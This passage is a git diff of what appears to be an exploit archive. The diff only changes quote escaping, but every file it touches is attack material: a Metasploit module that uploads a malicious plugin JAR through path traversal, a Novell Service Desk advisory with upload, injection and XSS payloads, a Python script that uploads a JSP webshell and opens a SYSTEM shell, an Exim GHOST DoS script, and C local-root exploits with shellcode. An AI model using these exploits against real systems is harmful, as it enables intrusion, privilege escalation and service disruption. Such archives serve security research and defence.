\"#{base}setup/setup-/../../log.jsp\" + path = "#{base}setup/setup-/../../log.jsp" res = send_request_cgi( { - \'uri\' => path + 'uri' => path }) if (not res) or (res.code != 200) - print_error(\"Failed: Error requesting #{path}\") + print_error("Failed: Error requesting #{path}") return Exploit::CheckCode::Unknown end @@ -133,83 +133,83 @@ class Metasploit3 < Msf::Exploit::Remote def get_plugin_jar(plugin_name) files = [ - [ \"logo_large.gif\" ], - [ \"logo_small.gif\" ], - [ \"readme.html\" ], - [ \"changelog.html\" ], - [ \"lib\", \"plugin-metasploit.jar\" ] + [ "logo_large.gif" ], + [ "logo_small.gif" ], + [ "readme.html" ], + [ "changelog.html" ], + [ "lib", "plugin-metasploit.jar" ] ] jar = Rex::Zip::Jar.new - jar.add_files(files, File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-6508\")) + jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508")) - plugin_author = datastore[\'PLUGINAUTHOR\'] || rand_text_alphanumeric(8+rand(8)) - plugin_desc = datastore[\'PLUGINDESC\'] || rand_text_alphanumeric(8+rand(8)) + plugin_author = datastore['PLUGINAUTHOR'] || rand_text_alphanumeric(8+rand(8)) + plugin_desc = datastore['PLUGINDESC'] || rand_text_alphanumeric(8+rand(8)) - plugin_xml = File.open(File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-6508\", \"plugin.xml\"), \"rb\") {|fd| fd.read() } + plugin_xml = File.open(File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508", "plugin.xml"), "rb") {|fd| fd.read() } plugin_xml.gsub!(/PLUGINNAME/, plugin_name) plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc) plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author) - jar.add_file(\"plugin.xml\", plugin_xml) + jar.add_file("plugin.xml", plugin_xml) jar end def exploit base = target_uri.path - base << \'/\' if base[-1, 1] != \'/\' + base << '/' if base[-1, 1] != '/' - plugin_name = datastore[\'PLUGINNAME\'] || rand_text_alphanumeric(8+rand(8)) + plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(8+rand(8)) plugin = get_plugin_jar(plugin_name) arch = target.arch - plat = [Msf::Module::PlatformList.new(target[\'Platform\']).platforms[0]] + plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]] if (p = exploit_regenerate_payload(plat, arch)) == nil - print_error(\"Failed to regenerate payload\") + print_error("Failed to regenerate payload") return end - plugin.add_file(\"lib/#{rand_text_alphanumeric(8)}.jar\", payload.encoded_jar.pack) + plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack) plugin.build_manifest # Upload the plugin to the server - print_status(\"Uploading plugin #{plugin_name} to the server\") + print_status("Uploading plugin #{plugin_name} to the server") boundary = rand_text_alphanumeric(6) - data = \"--#{boundary}\\r\\nContent-Disposition: form-data; name=\\\"uploadfile\\\"; \" - data << \"filename=\\\"#{plugin_name}.jar\\\"\\r\\nContent-Type: application/java-archive\\r\\n\\r\\n\" + data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"uploadfile\"; " + data << "filename=\"#{plugin_name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n" data << plugin.pack - data << \"\\r\\n--#{boundary}--\" + data << "\r\n--#{boundary}--" res = send_request_cgi({ - \'uri\' => \"#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin\", - \'method\' => \'POST\', - \'data\' => data, - \'headers\' => + 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin", + 'method' => 'POST', + 'data' => data, + 'headers' => { - \'Content-Type\' => \'multipart/form-data; boundary=\' + boundary, - \'Content-Length\' => data.length, - \'Cookie\' => \"JSESSIONID=#{rand_text_numeric(13)}\", + 'Content-Type' => 'multipart/form-data; boundary=' + boundary, + 'Content-Length' => data.length, + 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", } }) - print_error(\"Warning: got no response from the upload, continuing...\") if !res + print_error("Warning: got no response from the upload, continuing...") if !res # Delete the uploaded JAR file - if datastore[\'REMOVE_PLUGIN\'] - print_status(\"Deleting plugin #{plugin_name} from the server\") + if datastore['REMOVE_PLUGIN'] + print_status("Deleting plugin #{plugin_name} from the server") res = send_request_cgi({ - \'uri\' => \"#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}\", - \'headers\' => + 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}", + 'headers' => { - \'Cookie\' => \"JSESSIONID=#{rand_text_numeric(13)}\", + 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", } }) if not res - print_error(\"Error deleting the plugin #{plugin_name}. You might want to do this manually.\") + print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.") end end end diff --git a/platforms/jsp/webapps/39687.txt b/platforms/jsp/webapps/39687.txt index 030939a6c..78f555bcf 100755 --- a/platforms/jsp/webapps/39687.txt +++ b/platforms/jsp/webapps/39687.txt @@ -4,11 +4,11 @@ Disclosure: 30/03/2016 / Last updated: 10/04/2016 >> Background on the affected products: -\"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians\" +"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians" >> Summary: -Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:\"LiveTime/WebObjects\". Version 7.2 and above now appear to be branded as \"Micro Focus Service Desk\". +Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:"LiveTime/WebObjects". Version 7.2 and above now appear to be branded as "Micro Focus Service Desk". Advisories for these vulnerabilities can be found in the Micro Focus site at [1], [2], [3] and [4]. @@ -32,7 +32,7 @@ Content-Type: multipart/form-data; boundary=---------------------------247747071 Content-Length: 533 -----------------------------2477470717121 -Content-Disposition: form-data; name=\"0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23\"; filename=\"../../srv/tomcat6/webapps/LiveTime/bla5.jsp\" +Content-Disposition: form-data; name="0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"; filename="../../srv/tomcat6/webapps/LiveTime/bla5.jsp" Content-Type: application/octet-stream @@ -45,7 +45,7 @@ Content-Type: application/octet-stream -----------------------------2477470717121 -Content-Disposition: form-data; name=\"ButtonUpload\" +Content-Disposition: form-data; name="ButtonUpload" Upload -----------------------------2477470717121-- @@ -102,7 +102,7 @@ Affected versions: GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile?attachmentId=1&entityName= Input is passed directly to Hibernate (line 125 of DownloadAction.class): - List attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append(\"from \").append(hasEn).append(\" as attach where attach.attachmentId = \").append(hasId.intValue()).toString()).list(); + List attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append("from ").append(hasEn).append(" as attach where attach.attachmentId = ").append(hasId.intValue()).toString()).list(); hasEn is entityName (string) and hasId is attachmentId (integer) @@ -123,7 +123,7 @@ a) In the customer portal, clicking the user name will allow you to edit your display name. The fields tf_aClientFirstName and tf_aClientLastName are also vulnerable to stored XSS. Other fields might be vulnerable but have not been tested. Example: -tf_aClientFirstName=Jos\">e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName=\">Guestaa +tf_aClientFirstName=Jos">e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName=">Guestaa This can be used to attack an administrator or any other management user, as the name will be changed globally. If an administrator sees the list of users an alert box will pop up. @@ -131,7 +131,7 @@ b) In the Forums the content section is vulnerable when creating a new topic. The affected parameter is ta_selectedTopicContent. Example: -tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent=\">&ButtonSave=Save +tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent=">&ButtonSave=Save The alert box will pop up when you view the topic. @@ -141,16 +141,16 @@ Example: POST /LiveTime/WebObjects/LiveTime.woa/wo/18.0.53.21.0.4.1.3.0.1 HTTP/1.1 -----------------------------3162880314525 -Content-Disposition: form-data; name=\"tf_orgUnitName\" +Content-Disposition: form-data; name="tf_orgUnitName" -\"> +"> The alert box will pop up when you view the Organizational Units page and possibly in other pages. d) In Configuration -> Vendors, the manufacturer name, address and city parameters are vulnerable when you are creating a new Vendor. Example: -tf_aManufacturerFullName=\">&tf_aManufacturerName=\">&tf_aManufacturerAddress=\">&tf_aManufacturerCity=\">&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save +tf_aManufacturerFullName=">&tf_aManufacturerName=">&tf_aManufacturerAddress=">&tf_aManufacturerCity=">&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save Three alert boxes will pop up when you view the Vendor page and possibly in other pages. diff --git a/platforms/jsp/webapps/39691.py b/platforms/jsp/webapps/39691.py index 9629ec093..1aea01378 100755 --- a/platforms/jsp/webapps/39691.py +++ b/platforms/jsp/webapps/39691.py @@ -9,19 +9,19 @@ import urllib2 import urllib -ip = \'192.168.150.239\' +ip = '192.168.150.239' port = 8088 -url = \"http://\" + ip + \":\" + str(port) +url = "http://" + ip + ":" + str(port) #bypass authentication -url = url+\"/olt/Login.do/../../olt/UploadFileUpload.do\" +url = url+"/olt/Login.do/../../olt/UploadFileUpload.do" request = urllib2.Request(url) -webshell_content=\'\'\' -<%@ page import=\"java.util.*,java.io.*\" %> +webshell_content=''' +<%@ page import="java.util.*,java.io.*" %> <% - if (request.getParameter(\"{cmd}\") != null) {{ - Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParameter(\"{cmd}\")); + if (request.getParameter("{cmd}") != null) {{ + Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); @@ -32,65 +32,65 @@ webshell_content=\'\'\' }} }} %> -\'\'\' -boundary = \"---------------------------7e01e2240a1e\" -request.add_header(\'Content-Type\', \"multipart/form-data; boundary=\" + boundary) -post_data = \"--\" + boundary + \"\\r\\n\" -post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.extension\\\"\\r\\n\" -post_data = post_data + \"\\r\\n.jsp\\r\\n\" -post_data = post_data + \"--\" + boundary + \"\\r\\n\" -post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName1\\\"\\r\\n\" -post_data = post_data + \"\\r\\nwebshell.jsp\\r\\n\" -post_data = post_data + \"--\" + boundary + \"\\r\\n\" -post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName2\\\"\\r\\n\" -post_data = post_data + \"\\r\\n\\r\\n\" -post_data = post_data + \"--\" + boundary + \"\\r\\n\" -post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName3\\\"\\r\\n\" -post_data = post_data + \"\\r\\n\\r\\n\" -post_data = post_data + \"--\" + boundary + \"\\r\\n\" -post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName4\\\"\\r\\n\" -post_data = post_data + \"\\r\\n\\r\\n\" -post_data = post_data + \"--\" + boundary + \"\\r\\n\" -post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileType\\\"\\r\\n\" -post_data = post_data + \"\\r\\n*\\r\\n\" -post_data = post_data + \"--\" + boundary + \"\\r\\n\" -post_data = post_data + \"Content-Disposition: form-data; name=\\\"file1\\\"; filename=\\\"webshell.jsp\\\"\\r\\n\" -post_data = post_data + \"Content-Type: text/plain\\r\\n\" -post_data = post_data + \"\\r\\n\" + webshell_content +\"\\r\\n\" -post_data = post_data + \"--\" + boundary + \"\\r\\n\" -post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.repository\\\"\\r\\n\" -post_data = post_data + \"\\r\\nDefault\\r\\n\" -post_data = post_data + \"--\" + boundary + \"\\r\\n\" -post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.workspace\\\"\\r\\n\" -post_data = post_data + \"\\r\\n.\\r\\n\" -post_data = post_data + \"--\" + boundary + \"\\r\\n\" -post_data = post_data + \"Content-Disposition: form-data; name=\\\"directory\\\"\\r\\n\" -post_data = post_data + \"\\r\\n\" + \"../oats\\servers\\AdminServer\\\\tmp\\_WL_user\\oats_ee\\\\1ryhnd\\war\\pages\" +\"\\r\\n\" -post_data = post_data + \"--\" + boundary + \"--\"+\"\\r\\n\" +''' +boundary = "---------------------------7e01e2240a1e" +request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary) +post_data = "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n" +post_data = post_data + "\r\n.jsp\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n" +post_data = post_data + "\r\nwebshell.jsp\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n" +post_data = post_data + "\r\n\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n" +post_data = post_data + "\r\n\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n" +post_data = post_data + "\r\n\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n" +post_data = post_data + "\r\n*\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n" +post_data = post_data + "Content-Type: text/plain\r\n" +post_data = post_data + "\r\n" + webshell_content +"\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n" +post_data = post_data + "\r\nDefault\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n" +post_data = post_data + "\r\n.\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n" +post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n" +post_data = post_data + "--" + boundary + "--"+"\r\n" try: request.add_data(post_data) response = urllib2.urlopen(request) if response.code == 200 : - print \"[+]upload done!\" - webshellurl = \"http://\" + ip + \":\" + str(port) + \"/olt/pages/webshell.jsp\" - print \"[+]wait a moment,detecting whether the webshell exists...\" + print "[+]upload done!" + webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp" + print "[+]wait a moment,detecting whether the webshell exists..." if urllib2.urlopen(webshellurl).code == 200 : - print \"[+]upload webshell successfully!\" - print \"[+]return a cmd shell\" + print "[+]upload webshell successfully!" + print "[+]return a cmd shell" while True: - cmd = raw_input(\">>: \") - if cmd == \"exit\" : + cmd = raw_input(">>: ") + if cmd == "exit" : break - print urllib.urlopen(webshellurl+\"?{cmd}=\" + cmd).read().lstrip() + print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip() else: - print \"[-]attack fail!\" + print "[-]attack fail!" else: - print \"[-]attack fail!\" + print "[-]attack fail!" except Exception as e: - print \"[-]attack fail!\" + print "[-]attack fail!" -\'\'\' +''' #run the exploit and get a cmd shell root@kali:~/Desktop# python exploit.py [+]upload done! @@ -98,10 +98,10 @@ root@kali:~/Desktop# python exploit.py [+]upload webshell successfully! [+]return a cmd shell >>: whoami -nt authority\\system +nt authority\system >>: exit -\'\'\' +''' diff --git a/platforms/linux/dos/35951.py b/platforms/linux/dos/35951.py index 854da8489..1509943d2 100755 --- a/platforms/linux/dos/35951.py +++ b/platforms/linux/dos/35951.py @@ -13,7 +13,7 @@ # # USAGE: python ghost-smtp-dos.py # -# Escape character is \'^]\'. +# Escape character is '^]'. # 220 debian-7-7-64b ESMTP Exim 4.80 ... # HELO # 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 @@ -33,28 +33,28 @@ def main(argv): argc = len(argv) if argc <= 1: - print \"usage: %s \" % (argv[0]) + print "usage: %s " % (argv[0]) sys.exit(0) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - buffer = \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 - 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\" + buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" target = argv[1] # SET TARGET port = argv[2] # SET PORT - print \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\" - print \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer)) + print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com" + print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer)) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((target,int(port))) data = s.recv(1024) - print \"CONNECTION: \" +data - s.send(\'HELO \' + buffer + \'\\r\\n\') + print "CONNECTION: " +data + s.send('HELO ' + buffer + '\r\n') data = s.recv(1024) - print \"received: \" +data - s.send(\'EHLO \' + buffer + \'\\r\\n\') + print "received: " +data + s.send('EHLO ' + buffer + '\r\n') data = s.recv(1024) - print \"received: \" +data + print "received: " +data s.close() main(sys.argv) diff --git a/platforms/linux/local/1215.c b/platforms/linux/local/1215.c index a3a05addb..c073bdb34 100755 --- a/platforms/linux/local/1215.c +++ b/platforms/linux/local/1215.c @@ -7,12 +7,12 @@ /* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */ char shellcode[]= - \"\\x31\\xc0\\x31\\xdb\\x50\\x68\\x2f\\x2f\" - \"\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\" - \"\\xe3\\x50\\x53\\x89\\xe1\\x31\\xd2\\xb0\" - \"\\x0b\\x51\\x52\\x55\\x89\\xe5\\x0f\\x34\" - \"\\x31\\xc0\\x31\\xdb\\xfe\\xc0\\x51\\x52\" - \"\\x55\\x89\\xe5\\x0f\\x34\"; + "\x31\xc0\x31\xdb\x50\x68\x2f\x2f" + "\x73\x68\x68\x2f\x62\x69\x6e\x89" + "\xe3\x50\x53\x89\xe1\x31\xd2\xb0" + "\x0b\x51\x52\x55\x89\xe5\x0f\x34" + "\x31\xc0\x31\xdb\xfe\xc0\x51\x52" + "\x55\x89\xe5\x0f\x34"; int main(int argc,char **argv){ char buf[96]; @@ -20,30 +20,30 @@ int main(int argc,char **argv){ unsigned long ret; int i, offset; unsigned long sp(void) - { __asm__(\"movl %esp, %eax\");} + { __asm__("movl %esp, %eax");} char *prog[]={argv[1],buf,NULL}; - char *env[]={\"3v1lsh3ll0=\",shellcode,NULL}; + char *env[]={"3v1lsh3ll0=",shellcode,NULL}; if (argc >= 2) { - printf(\"\\n*********************************************\\n\"); - printf(\" iwconfig Version 26 Localroot Exploit \\n\"); - printf(\" Coded by Qnix[at]bsdmail[dot]org \\n\"); - printf(\"*********************************************\\n\\n\"); + printf("\n*********************************************\n"); + printf(" iwconfig Version 26 Localroot Exploit \n"); + printf(" Coded by Qnix[at]bsdmail[dot]org \n"); + printf("*********************************************\n\n"); } else { - printf(\"\\n*********************************************\\n\"); - printf(\" iwconfig Version 26 Localroot Exploit \\n\"); - printf(\" Coded by Qnix[at]bsdmail[dot]org \\n\"); - printf(\"*********************************************\\n\\n\"); - printf(\"\\n USEAGE: ./iwconfig-exploit \\n\\n\"); + printf("\n*********************************************\n"); + printf(" iwconfig Version 26 Localroot Exploit \n"); + printf(" Coded by Qnix[at]bsdmail[dot]org \n"); + printf("*********************************************\n\n"); + printf("\n USEAGE: ./iwconfig-exploit \n\n"); return 1; } offset = 0; esp = sp(); ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06; - printf(\"[~] S-p.ESP : 0x%x\\n\", esp); - printf(\"[~] O-F.ESP : 0x%x\\n\", offset); - printf(\"[~] Return Addr : 0x%x\\n\\n\", ret); + printf("[~] S-p.ESP : 0x%x\n", esp); + printf("[~] O-F.ESP : 0x%x\n", offset); + printf("[~] Return Addr : 0x%x\n\n", ret); memset(buf,0x41,sizeof(buf)); memcpy(&buf[92],&ret,4); diff --git a/platforms/linux/local/140.c b/platforms/linux/local/140.c index 77569b00a..470d43e6f 100755 --- a/platforms/linux/local/140.c +++ b/platforms/linux/local/140.c @@ -11,7 +11,7 @@ #include #include -#define BIN \"/usr/games/xsok\" +#define BIN "/usr/games/xsok" #define RETADD 0xbffffa3c #define SIZE 200 @@ -19,12 +19,12 @@ unsigned char shellcode[] = /* setregid (20,20) shellcode */ - \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb3\\x14\\xb1\\x14\\xb0\\x47\" - \"\\xcd\\x80\" + "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47" + "\xcd\x80" /* exec /bin/sh shellcode */ - \"\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\" - \"\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\x8d\\x42\\x0b\\xcd\\x80\"; + "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" + "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; @@ -33,8 +33,8 @@ int main (int argc, char ** argv) int i, ret = RETADD; char out[SIZE]; - fprintf(stdout, \"\\n --- 0x333xsok => xsok 1.02 local games exploit ---\\n\"); - fprintf(stdout, \" --- Outsiders Se(c)urity Labs 2003 ---\\n\\n\"); + fprintf(stdout, "\n --- 0x333xsok => xsok 1.02 local games exploit ---\n"); + fprintf(stdout, " --- Outsiders Se(c)urity Labs 2003 ---\n\n"); int *xsok = (int *)(out); @@ -43,7 +43,7 @@ int main (int argc, char ** argv) memset((char *)out, 0x90, 63); memcpy((char *)out+63, shellcode, strlen(shellcode)); - execl (BIN, BIN, \"-xsokdir\", out, 0x0); + execl (BIN, BIN, "-xsokdir", out, 0x0); } // milw0rm.com [2004-01-02] diff --git a/platforms/linux/local/178.c b/platforms/linux/local/178.c index 925d72b9d..024b1ef1f 100755 --- a/platforms/linux/local/178.c +++ b/platforms/linux/local/178.c @@ -2,7 +2,7 @@ * MasterSecuritY * * openwall.c - Local root exploit in LBNL traceroute - * Copyright (C) 2000 Michel \"MaXX\" Kaempf + * Copyright (C) 2000 Michel "MaXX" Kaempf * * Updated versions of this exploit and the corresponding advisory will * be made available at: @@ -32,32 +32,32 @@ #define PREV_INUSE 0x1 #define IS_MMAPPED 0x2 -char * filename = \"/usr/sbin/traceroute\"; +char * filename = "/usr/sbin/traceroute"; unsigned int stack = 0xc0000000 - 4; unsigned int p = 0x0804ce38; unsigned int victim = 0x0804c88c; -char * jmp = \"\\xeb\\x0aXXYYYYZZZZ\"; +char * jmp = "\xeb\x0aXXYYYYZZZZ"; char * shellcode = /* : xor %edx,%edx */ - \"\\x31\\xd2\" + "\x31\xd2" /* : mov %edx,%eax */ - \"\\x89\\xd0\" + "\x89\xd0" /* : mov $0xb,%al */ - \"\\xb0\\x0b\" + "\xb0\x0b" /* : mov $XXXX,%ebx */ - \"\\xbbXXXX\" + "\xbbXXXX" /* : mov $XXXX,%ecx */ - \"\\xb9XXXX\" + "\xb9XXXX" /* : mov %ebx,(%ecx) */ - \"\\x89\\x19\" + "\x89\x19" /* : mov %edx,0x4(%ecx) */ - \"\\x89\\x51\\x04\" + "\x89\x51\x04" /* : int $0x80 */ - \"\\xcd\\x80\"; + "\xcd\x80"; -char * program = \"/bin/sh\"; +char * program = "/bin/sh"; int zero( unsigned int ui ) { @@ -71,29 +71,29 @@ int main() { char gateway[ 1337 ]; char host[ 1337 ]; - char * argv[] = { filename, \"-g\", \"123\", \"-g\", gateway, host, NULL }; + char * argv[] = { filename, "-g", "123", "-g", gateway, host, NULL }; unsigned int next; int i; unsigned int hellcode; unsigned int size; - strcpy( host, \"AAAABBBBCCCCDDDDEEEE\" ); - next = stack - (strlen(filename) + 1) - (strlen(host) + 1) + strlen(\"AAAA\"); + strcpy( host, "AAAABBBBCCCCDDDDEEEE" ); + next = stack - (strlen(filename) + 1) - (strlen(host) + 1) + strlen("AAAA"); for ( i = 0; i < next - (next & ~3); i++ ) { - strcat( host, \"X\" ); + strcat( host, "X" ); } next = next & ~3; ((unsigned int *)host)[1] = 0xffffffff & ~PREV_INUSE; ((unsigned int *)host)[2] = 0xffffffff; if ( zero( victim - 12 ) ) { - fprintf( stderr, \"Null byte(s) in `victim - 12\' (0x%08x)!\\n\", victim - 12 ); + fprintf( stderr, "Null byte(s) in `victim - 12' (0x%08x)!\n", victim - 12 ); return( -1 ); } ((unsigned int *)host)[3] = victim - 12; - hellcode = p + (strlen(\"123\") + 1) + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \"); + hellcode = p + (strlen("123") + 1) + strlen("0x42.0x42.0x42.0x42") + strlen(" "); if ( zero( hellcode ) ) { - fprintf( stderr, \"Null byte(s) in `host\' (0x%08x)!\\n\", hellcode ); + fprintf( stderr, "Null byte(s) in `host' (0x%08x)!\n", hellcode ); return( -1 ); } ((unsigned int *)host)[4] = hellcode; @@ -102,31 +102,31 @@ int main() size = size | PREV_INUSE; sprintf( gateway, - \"0x%02x.0x%02x.0x%02x.0x%02x\", + "0x%02x.0x%02x.0x%02x.0x%02x", ((unsigned char *)(&size))[0], ((unsigned char *)(&size))[1], ((unsigned char *)(&size))[2], ((unsigned char *)(&size))[3] ); - strcat( gateway, \" \" ); + strcat( gateway, " " ); strcat( gateway, jmp ); strcat( gateway, shellcode ); strcat( gateway, program ); hellcode += strlen(jmp) + strlen(shellcode); if ( zero( hellcode ) ) { - fprintf( stderr, \"Null byte(s) in `gateway\' (0x%08x)!\\n\", hellcode ); + fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode ); return( -1 ); } - *((unsigned int *)(gateway + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \") + strlen(jmp) + 7)) = hellcode; + *((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 7)) = hellcode; hellcode += strlen(program) + 1; if ( zero( hellcode ) ) { - fprintf( stderr, \"Null byte(s) in `gateway\' (0x%08x)!\\n\", hellcode ); + fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode ); return( -1 ); } - *((unsigned int *)(gateway + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \") + strlen(jmp) + 12)) = hellcode; + *((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 12)) = hellcode; execve( argv[0], argv, NULL ); return( -1 ); diff --git a/platforms/linux/local/184.pl b/platforms/linux/local/184.pl index a0b44cb3c..7b13f7d55 100755 --- a/platforms/linux/local/184.pl 